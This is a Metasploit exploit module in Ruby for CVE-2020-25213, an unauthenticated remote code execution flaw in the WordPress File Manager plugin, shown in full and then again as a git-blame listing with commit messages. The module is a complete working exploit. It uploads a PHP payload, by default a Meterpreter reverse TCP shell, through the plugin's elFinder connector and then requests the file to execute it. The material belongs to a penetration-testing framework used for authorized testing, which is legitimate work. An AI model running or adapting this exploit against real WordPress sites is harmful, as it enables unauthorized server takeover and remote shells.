modules/exploits/multi/http/wp_file_manager_rce.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',
        'Description' => %q{
          The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and
          execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php
          extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write
          PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Alex Souza (w4fz5uck5)', # initial discovery and PoC
          'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module
        ],
        'References' => [
          [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],
          [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],
          [ 'CVE', '2020-25213' ]
        ],
        'Platform' => [ 'php' ],
        'Privileged' => false,
        'Arch' => ARCH_PHP,
        'Targets' => [
          [
            'WordPress File Manager 6.0-6.8',
            {
              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
            }
          ]
        ],
        'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )
    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),
        OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])
      ]
    )
  end

  def check
    return CheckCode::Unknown unless wordpress_and_online?

    # check the plugin version from readme
    check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')
  end

  def exploit
    # base path to File Manager plugin
    file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')
    # filename of the file to be uploaded/created
    filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php"
    register_file_for_cleanup(filename)

    case datastore['COMMAND']
    when 'upload'
      elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)
    when 'mkfile+put'
      elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)
      elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)
    end

    payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)
    print_status("#{peer} - Payload is at #{payload_uri}")
    # execute the payload
    send_request_cgi('uri' => normalize_uri(payload_uri))
  end

  # make it easier to switch between "upload" and "mkfile+put" exploit methods
  def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})
    filename = opts['filename']

    # prep for exploit
    post_data = Rex::MIME::Message.new
    post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name="cmd"')

    case elfinder_cmd
    when 'upload'
      post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
      post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
    when 'mkfile'
      post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
      post_data.add_part(filename, nil, nil, 'form-data; name="name"')
    when 'put'
      post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"')
      post_data.add_part(payload.encoded, nil, nil, 'form-data; name="content"')
    end

    res = send_request_cgi(
      'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'data' => post_data.to_s
    )

    fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
  end
end
Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00			`##`
			`# This module requires Metasploit: https://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`class MetasploitModule < Msf::Exploit::Remote`
			`Rank = NormalRanking`

Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00			`include Msf::Exploit::Remote::HTTP::Wordpress`
add AutoCheck usage, minor changes 2020-11-04 10:04:14 -06:00			`prepend Msf::Exploit::Remote::AutoCheck`
add filedropper usage 2020-11-10 08:47:53 -06:00			`include Msf::Exploit::FileDropper`
Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00
			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00			`'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',`
Fix module according to Rubocop, make documentation follow standard. 2020-10-11 19:04:06 +08:00			`'Description' => %q{`
Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00			`The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and`
Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00			`execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php`
			`extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write`
			`PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.`
Fix module according to Rubocop, make documentation follow standard. 2020-10-11 19:04:06 +08:00			`},`
			`'License' => MSF_LICENSE,`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`'Author' => [`
			`'Alex Souza (w4fz5uck5)', # initial discovery and PoC`
			`'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module`
			`],`
			`'References' => [`
			`[ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],`
			`[ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],`
			`[ 'CVE', '2020-25213' ]`
			`],`
Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00			`'Platform' => [ 'php' ],`
Fix module according to Rubocop, make documentation follow standard. 2020-10-11 19:04:06 +08:00			`'Privileged' => false,`
			`'Arch' => ARCH_PHP,`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`'Targets' => [`
Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00			`[`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`'WordPress File Manager 6.0-6.8',`
			`{`
			`'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }`
			`}`
			`]`
			`],`
Fix module according to Rubocop, make documentation follow standard. 2020-10-11 19:04:06 +08:00			`'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020`
Add additional reliability and stability notes to modules 2023-02-10 18:04:31 +00:00			`'DefaultTarget' => 0,`
			`'Notes' => {`
			`'Stability' => [ CRASH_SAFE ],`
			`'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],`
			`'Reliability' => [ REPEATABLE_SESSION ]`
			`}`
Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00			`)`
			`)`
			`register_options(`
			`[`
Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00			`OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),`
			`OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])`
			`]`
Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00			`)`
			`end`

			`def check`
add AutoCheck usage, minor changes 2020-11-04 10:04:14 -06:00			`return CheckCode::Unknown unless wordpress_and_online?`
Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00
add AutoCheck usage, minor changes 2020-11-04 10:04:14 -06:00			`# check the plugin version from readme`
add filedropper usage 2020-11-10 08:47:53 -06:00			`check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')`
Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00			`end`

			`def exploit`
add AutoCheck usage, minor changes 2020-11-04 10:04:14 -06:00			`# base path to File Manager plugin`
			`file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')`
			`# filename of the file to be uploaded/created`
			`filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php"`
add filedropper usage 2020-11-10 08:47:53 -06:00			`register_file_for_cleanup(filename)`
Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00
add AutoCheck usage, minor changes 2020-11-04 10:04:14 -06:00			`case datastore['COMMAND']`
			`when 'upload'`
			`elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)`
			`when 'mkfile+put'`
			`elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)`
			`elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)`
Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00			`end`
add AutoCheck usage, minor changes 2020-11-04 10:04:14 -06:00
			`payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)`
			`print_status("#{peer} - Payload is at #{payload_uri}")`
			`# execute the payload`
			`send_request_cgi('uri' => normalize_uri(payload_uri))`
Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00			`end`
Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00
Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00			`# make it easier to switch between "upload" and "mkfile+put" exploit methods`
			`def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})`
			`filename = opts['filename']`
Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00
Use `Rex::MIME` for building MIME message 2020-10-16 00:26:10 +08:00			`# prep for exploit`
			`post_data = Rex::MIME::Message.new`
			`post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name="cmd"')`
Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00
Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00			`case elfinder_cmd`
			`when 'upload'`
Use `Rex::MIME` for building MIME message 2020-10-16 00:26:10 +08:00			`post_data.add_part('l1_', nil, nil, 'form-data; name="target"')`
add AutoCheck usage, minor changes 2020-11-04 10:04:14 -06:00			`post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")`
Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00			`when 'mkfile'`
Use `Rex::MIME` for building MIME message 2020-10-16 00:26:10 +08:00			`post_data.add_part('l1_', nil, nil, 'form-data; name="target"')`
			`post_data.add_part(filename, nil, nil, 'form-data; name="name"')`
Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00			`when 'put'`
Use `Rex::MIME` for building MIME message 2020-10-16 00:26:10 +08:00			`post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"')`
add AutoCheck usage, minor changes 2020-11-04 10:04:14 -06:00			`post_data.add_part(payload.encoded, nil, nil, 'form-data; name="content"')`
Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00			`end`
Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00
			`res = send_request_cgi(`
			`'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),`
			`'method' => 'POST',`
Use `Rex::MIME` for building MIME message 2020-10-16 00:26:10 +08:00			`'ctype' => "multipart/form-data; boundary=#{post_data.bound}",`
			`'data' => post_data.to_s`
Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00			`)`

			`fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res`
			`fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200`
Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00			`end`
			`end`